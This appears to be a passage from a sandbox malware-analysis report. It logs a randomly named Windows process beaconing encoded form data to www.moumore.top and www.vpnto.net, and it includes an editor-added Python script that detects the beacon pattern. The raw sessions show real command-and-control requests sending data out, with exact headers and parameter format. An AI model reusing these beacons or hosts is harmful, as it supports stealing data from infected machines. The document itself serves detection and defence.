                                                  Nov 19, 2024 03:56:50.916955948 CET212INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                  Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-268
                                                  Nov 19, 2024 03:56:50.916990042 CET1236INData Raw: 35 2e 37 34 34 31 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30
                                                  Data Ascii: 5.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263.51309 c -90.20375,-0.0994 -119.20375,-0.0994 -119
                                                  Nov 19, 2024 03:56:50.917026043 CET1236INData Raw: 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 34 39 36 22 0a 20 20 20 20
                                                  Data Ascii: nejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914603,-0.23621 -3.505591,1.17801 -4.861444,2.68113 -
                                                  Nov 19, 2024 03:56:50.917067051 CET1236INData Raw: 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 31 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 37 34 2e
                                                  Data Ascii: ke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433 -18.781379,20.01048 -5.583823,6.66719 -10.749655,1
                                                  Nov 19, 2024 03:56:50.917125940 CET636INData Raw: 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72
                                                  Data Ascii: none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.2
                                                  Nov 19, 2024 03:56:50.917161942 CET1236INData Raw: 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64
                                                  Data Ascii: p:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012
                                                  Nov 19, 2024 03:56:50.917201996 CET1236INData Raw: 30 35 2c 35 2e 38 30 34 31 36 20 31 2e 34 35 38 35 30 35 2c 36 2e 39 38 32 35 37 20 32 2e 34 30 32 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34
                                                  Data Ascii: 05,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53
                                                  Nov 19, 2024 03:56:50.917236090 CET424INData Raw: 33 39 20 31 2e 31 31 39 39 33 32 2c 31 39 2e 38 30 33 37 39 20 32 2e 34 31 35 35 37 34 2c 33 37 2e 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70
                                                  Data Ascii: 39 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549"
                                                  Nov 19, 2024 03:56:50.917272091 CET1236INData Raw: 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39 33 20 32 2e 38 32 38 31 38 32 2c 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34
                                                  Data Ascii: 4,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-
                                                  Nov 19, 2024 03:56:50.922667980 CET1236INData Raw: 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33 34 39 39 38 20 63 20 2d 34 2e 32 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38
                                                  Data Ascii: id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />


                                                  Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49985 | Destination IP: 203.161.46.205 | Destination Port: 80 | PID: 4628 | Process: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 19, 2024 03:56:52.700404882 CET | 10823 | OUT | POST /cdzk/ HTTP/1.1
                                                  Host: www.moumore.top
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  Content-Length: 10305
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.moumore.top
                                                  Referer: http://www.moumore.top/cdzk/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                  Data Raw: 35 6c 66 38 66 76 38 48 3d 37 33 2b 34 79 7a 6f 78 43 70 47 4d 32 42 35 7a 67 32 44 72 42 55 6c 6a 65 5a 44 35 38 42 6f 48 63 43 32 74 36 31 35 6f 63 72 45 50 36 62 39 62 42 6e 59 55 70 52 61 6a 69 36 75 73 72 33 43 59 42 58 4b 69 77 44 55 6b 42 6e 4e 45 34 46 61 38 6c 30 32 69 77 4c 73 6b 55 75 4e 69 73 57 65 46 63 55 4c 36 77 47 71 7a 44 6a 4c 62 73 6a 77 53 70 59 75 61 52 52 79 36 6f 77 2f 2b 71 59 76 76 77 73 6e 32 6b 4a 70 39 43 73 43 45 73 36 52 77 75 4f 46 74 54 59 4f 49 42 37 4f 56 33 49 53 49 56 49 53 71 38 5a 33 34 44 33 47 4b 68 51 42 4e 65 2f 48 67 53 36 74 47 75 70 47 53 37 61 49 66 33 5a 51 33 55 7a 62 64 55 47 2f 56 4b 77 61 31 76 72 59 79 48 4d 53 47 52 4d 6e 5a 6c 41 72 59 6e 37 36 30 6f 65 6b 44 51 42 33 66 6c 36 65 33 6b 4e 51 72 67 72 30 68 51 65 31 31 68 31 69 74 6d 52 6b 75 77 46 37 74 45 48 63 49 33 61 78 4e 71 33 47 69 4f 62 2b 4a 73 4c 51 4f 72 33 6f 4f 59 6b 78 66 59 43 76 69 35 77 75 75 77 77 63 33 37 51 42 55 44 53 57 58 5a 4c 56 7a 54 32 77 2f 43 2b 31 2f 4f 77 56 45 79 [TRUNCATED]
                                                  Data Ascii: 5lf8fv8H=[TRUNCATED]
                                                  Nov 19, 2024 03:56:53.471395969 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 02:56:53 GMT
                                                  Server: Apache
                                                  Content-Length: 16052
                                                  Connection: close
                                                  Content-Type: text/html
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                  Nov 19, 2024 03:56:53.471466064 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                  Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                  Nov 19, 2024 03:56:53.471503973 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                  Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                  Nov 19, 2024 03:56:53.471539974 CET1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                  Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                  Nov 19, 2024 03:56:53.471579075 CET848INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                  Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                  Nov 19, 2024 03:56:53.471724987 CET1236INData Raw: 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64
                                                  Data Ascii: p:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012
                                                  Nov 19, 2024 03:56:53.471760035 CET1236INData Raw: 30 35 2c 35 2e 38 30 34 31 36 20 31 2e 34 35 38 35 30 35 2c 36 2e 39 38 32 35 37 20 32 2e 34 30 32 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34
                                                  Data Ascii: 05,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53
                                                  Nov 19, 2024 03:56:53.471813917 CET424INData Raw: 33 39 20 31 2e 31 31 39 39 33 32 2c 31 39 2e 38 30 33 37 39 20 32 2e 34 31 35 35 37 34 2c 33 37 2e 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70
                                                  Data Ascii: 39 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549"
                                                  Nov 19, 2024 03:56:53.472039938 CET1236INData Raw: 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39 33 20 32 2e 38 32 38 31 38 32 2c 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34
                                                  Data Ascii: 4,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-
                                                  Nov 19, 2024 03:56:53.472073078 CET212INData Raw: 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33 34 39 39 38 20 63 20 2d 34 2e 32 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38
                                                  Data Ascii: id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linej
                                                  Nov 19, 2024 03:56:53.476603031 CET1236INData Raw: 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 65 6c 6c 69 70 73 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 72 79 3d 22 34 2e 36 37 31 35 37 31 37 22 0a 20 20 20
                                                  Data Ascii: oin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5" cy="238.08525" cx="119.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;f
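Sessions 5 to 7 above repeat one exchange: a POST to /cdzk/ whose body is a single opaque parameter (5lf8fv8H=...), Origin and Referer headers that name the beacon URL itself although no page was ever fetched, a hard-coded Chrome/39 User-Agent, and the same 16052-byte Apache 404 page as the reply every time; session 8 that follows sends a GET with the same parameter key plus one short second key. The block below is an added example written for this page by the editor, not Joe Sandbox output and not FormBook code. It runs a small HTTP-transcript parser over transcripts constructed to mirror those sessions (real path, header set, parameter key, timestamps and decoy size; the parameter values are shortened placeholders) and flags the pattern both per exchange and across the session. The Chrome major-version cutoff and the cadence jitter bound are assumptions chosen for illustration.

```python
"""Triage of the HTTP beacon pattern recorded in sessions 5 to 8.

Added example by the editor; not Joe Sandbox output and not FormBook code.
The Chrome major-version cutoff and the cadence jitter bound are assumptions.
"""
import re
from collections import Counter
from datetime import datetime
from urllib.parse import parse_qsl, urlsplit

# Constructed transcripts modeled on the report: real path, header set,
# parameter key, timestamps and decoy size; the encoded parameter values are
# shortened placeholders, not the captured bytes.
UA = ("Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36")
DECOY_404 = ("HTTP/1.1 404 Not Found\nServer: Apache\nContent-Length: 16052\n"
             "Connection: close\nContent-Type: text/html\n\n<!DOCTYPE html>...")


def _post(ts, value):
    req = ("POST /cdzk/ HTTP/1.1\nHost: www.moumore.top\nConnection: close\n"
           "Content-Type: application/x-www-form-urlencoded\n"
           "Origin: http://www.moumore.top\nReferer: http://www.moumore.top/cdzk/\n"
           f"User-Agent: {UA}\n\n5lf8fv8H={value}")
    return ts, req, DECOY_404


SAMPLE = [
    _post("2024-11-19 03:56:47.609901", "73+4yzoxCpGM3hJz"),
    _post("2024-11-19 03:56:50.155286", "73+4yzoxCpGM2B5z"),
    _post("2024-11-19 03:56:52.700404", "73+4yzoxCpGM2B5zg2Dr"),
    ("2024-11-19 03:56:55.242980",
     "GET /cdzk/?5lf8fv8H=21WYxGgPduaG&AjEdl=yJNdk0d HTTP/1.1\n"
     f"Host: www.moumore.top\nConnection: close\nUser-Agent: {UA}\n\n",
     DECOY_404),
]


def parse_message(raw):
    """Split a newline-delimited HTTP message into (start line, headers, body)."""
    head, _, body = raw.partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def score_transaction(req_raw, resp_raw, min_chrome=60):
    """Return (reasons, parameter key, (status, content-length)) for one exchange."""
    start, h, body = parse_message(req_raw)
    method, target = start.split(" ")[:2]
    path, _, query = target.partition("?")
    host = h.get("host", "")
    keys = [k for k, _ in parse_qsl(body if method == "POST" else query)]
    reasons = []
    if method == "POST" and len(keys) == 1:
        reasons.append("form POST carries exactly one opaque parameter")
    if method == "GET" and len(keys) == 2 and len(keys[1]) <= 8:
        reasons.append("GET carries the parameter plus one short junk key")
    ref = urlsplit(h.get("referer", ""))
    if h.get("referer") and ref.netloc == host and ref.path == path:
        reasons.append("Referer is the beacon URL itself")
    if h.get("origin") and urlsplit(h["origin"]).netloc == host and method == "POST":
        reasons.append("Origin set to the target host on a bare form POST")
    m = re.search(r"Chrome/(\d+)\.", h.get("user-agent", ""))
    if m and int(m.group(1)) < min_chrome:
        reasons.append(f"hard-coded legacy Chrome/{m.group(1)} User-Agent")
    rstart, rh, _ = parse_message(resp_raw)
    status = int(rstart.split(" ")[1])
    if status == 404 and method == "POST":
        reasons.append("server answers the form POST with a 404 page")
    return reasons, (keys[0] if keys else None), (status, rh.get("content-length"))


def triage_session(txns, max_jitter=0.5):
    """Score each exchange, then look for consistency across the whole session."""
    per_txn, keys, shapes, times = [], Counter(), Counter(), []
    for ts, req, resp in txns:
        reasons, key, shape = score_transaction(req, resp)
        per_txn.append(reasons)
        if key:
            keys[key] += 1
        shapes[shape] += 1
        times.append(datetime.strptime(ts, "%Y-%m-%d %H:%M:%S.%f"))
    findings = []
    if keys and keys.most_common(1)[0][1] == len(txns):
        findings.append(f"parameter key {keys.most_common(1)[0][0]!r} reused in every request")
    if len(txns) > 1 and len(shapes) == 1:
        (status, clen), = shapes
        findings.append(f"identical {status} decoy ({clen} bytes) for every request")
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    if len(gaps) >= 2 and max(gaps) - min(gaps) <= max_jitter:
        findings.append(f"fixed beacon cadence of about {sum(gaps) / len(gaps):.1f}s")
    return per_txn, findings


if __name__ == "__main__":
    per_txn, findings = triage_session(SAMPLE)
    for sid, reasons in zip(range(5, 9), per_txn):
        print(f"session {sid}: " + "; ".join(reasons))
    print("session-level: " + "; ".join(findings))
```

No single check here is conclusive on its own (a legacy User-Agent or a 404 to a POST each occur in benign traffic), which is why the session-level pass matters: one parameter key reused across POST and GET, a byte-identical 404 decoy for every request, and a near-constant interval between beacons together are what make the traffic in this report recognisable without decoding the payload.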


                                                  Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 49997 | Destination IP: 203.161.46.205 | Destination Port: 80 | PID: 4628 | Process: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 19, 2024 03:56:55.242980957 CET | 461 | OUT | GET /cdzk/?5lf8fv8H=21WYxGgPduaG4GNc3Gz+IA1od9in8z0gHg6tlHBueZVX7I1lHyAgjC+unpy7ykSEAjKQ6zcABHQV1iatk3ebx4o/Jp1Tx0HqQTzE31uUJivnuywq0aLhSQU=&AjEdl=yJNdk0d HTTP/1.1
                                                  Host: www.moumore.top
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Nov 19, 2024 03:56:56.011625051 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 02:56:55 GMT
                                                  Server: Apache
                                                  Content-Length: 16052
                                                  Connection: close
                                                  Content-Type: text/html; charset=utf-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 50016 | 91.226.30.3 | 80 | 4628 | C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 19, 2024 03:57:01.284641027 CET | 715 | OUT | POST /s8dp/ HTTP/1.1
                                                  Host: www.vpnto.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  Content-Length: 205
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.vpnto.net
                                                  Referer: http://www.vpnto.net/s8dp/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                  Data Ascii: 5lf8fv8H=mnF1jX5o5LVGRsEu5kZpGYNFnPS+2ZjDRzx7mdMDa6evQ1L+FxnhAo1rbAGZo0EGNbZu7ubtIwz6+PRgiHsr2WeovlQRpELnkil8iuwe0w6Q8kfwKQoV3xw/ZQ5yIQgy/U+rVCNLrbLJGSBXs0Skrdfh/f2UKusV5JOliZT9/SKIUACxtBAH7++ZRBmnUU4ReQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 50017 | 91.226.30.3 | 80 | 4628 | C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 19, 2024 03:57:03.862509012 CET | 735 | OUT | POST /s8dp/ HTTP/1.1
                                                  Host: www.vpnto.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  Content-Length: 225
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.vpnto.net
                                                  Referer: http://www.vpnto.net/s8dp/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                  Data Ascii: 5lf8fv8H=mnF1jX5o5LVGQM0uqVZpNYM3svS+85jfRz97mcIpaIKvXRb+KUThDo1rDwGc1kEdNbVm7sPtIzP6+Ktgiw4okWeqnFQTtELnkil8iuk00wiQgEPwKxoS0xw8cQ5yMQh7/U+JVDhhrZDJGTxXslTWldeqx/3/Cr1+w4Cl64zu2wO+cmPr8whQp+aqMGvTZXFYFQ/By7+/aCEYXfyiWM3ba+c=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 50018 | 91.226.30.3 | 80 | 4628 | C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 19, 2024 03:57:06.409358025 CET | 10817 | OUT | POST /s8dp/ HTTP/1.1
                                                  Host: www.vpnto.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  Content-Length: 10305
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.vpnto.net
                                                  Referer: http://www.vpnto.net/s8dp/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Nov 19, 2024 03:57:07.534674883 CET | 1236 | IN | HTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Tue, 19 Nov 2024 02:57:07 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 50019 | 91.226.30.3 | 80 | 4628 | C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
Timestamp | Bytes transferred | Direction | Data
